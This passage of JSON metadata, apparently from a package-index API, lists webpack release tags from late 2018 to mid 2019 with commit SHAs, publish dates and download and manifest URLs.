te.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/